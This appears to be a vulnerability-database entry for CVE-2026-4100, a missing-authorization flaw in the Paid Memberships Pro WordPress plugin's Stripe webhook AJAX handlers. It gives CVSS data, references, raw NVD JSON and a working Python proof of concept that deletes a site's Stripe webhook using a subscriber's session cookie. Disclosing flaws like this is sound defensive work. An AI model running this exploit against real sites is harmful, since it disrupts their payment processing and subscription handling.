CVE-2026-4100

Description

The Paid Memberships Pro plugin for WordPress is vulnerable to unauthorized modification and disruption of Stripe webhook configuration in all versions up to, and including, 3.6.5. This is due to missing capability checks on the `wp_ajax_pmpro_stripe_create_webhook`, `wp_ajax_pmpro_stripe_delete_webhook`, and `wp_ajax_pmpro_stripe_rebuild_webhook` AJAX handlers. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete, create, or rebuild the site's Stripe webhook, disrupting all payment processing, subscription renewal synchronization, cancellation handling, and failed payment management.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Paid Memberships Pro <= 3.6.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Attacker's session cookie (Subscriber level)
cookies = {
    "wordpress_logged_in_xxx": "attacker_session_cookie_here"
}

# Payload to delete the Stripe webhook
# Vulnerable action: wp_ajax_pmpro_stripe_delete_webhook
data = {
    "action": "pmpro_stripe_delete_webhook"
}

try:
    response = requests.post(target_url, data=data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Stripe webhook has likely been deleted.")
        print("[+] Payment synchronization is now disrupted.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4100
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4100
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4100/
[4] VulDB https://vuldb.com/cve/CVE-2026-4100
[5] https://github.com/strangerstudios/paid-memberships-pro/pull/3615
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/5b333a3d-e416-42aa-9722-5406df0a64b3?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4100", "sourceIdentifier": "[email protected]", "published": "2026-05-02T12:16:16.477", "lastModified": "2026-05-05T19:15:34.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paid Memberships Pro plugin for WordPress is vulnerable to unauthorized modification and disruption of Stripe webhook configuration in all versions up to, and including, 3.6.5. This is due to missing capability checks on the `wp_ajax_pmpro_stripe_create_webhook`, `wp_ajax_pmpro_stripe_delete_webhook`, and `wp_ajax_pmpro_stripe_rebuild_webhook` AJAX handlers. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete, create, or rebuild the site's Stripe webhook, disrupting all payment processing, subscription renewal synchronization, cancellation handling, and failed payment management."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/strangerstudios/paid-memberships-pro/pull/3615", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5b333a3d-e416-42aa-9722-5406df0a64b3?source=cve", "source": "[email protected]"}]}}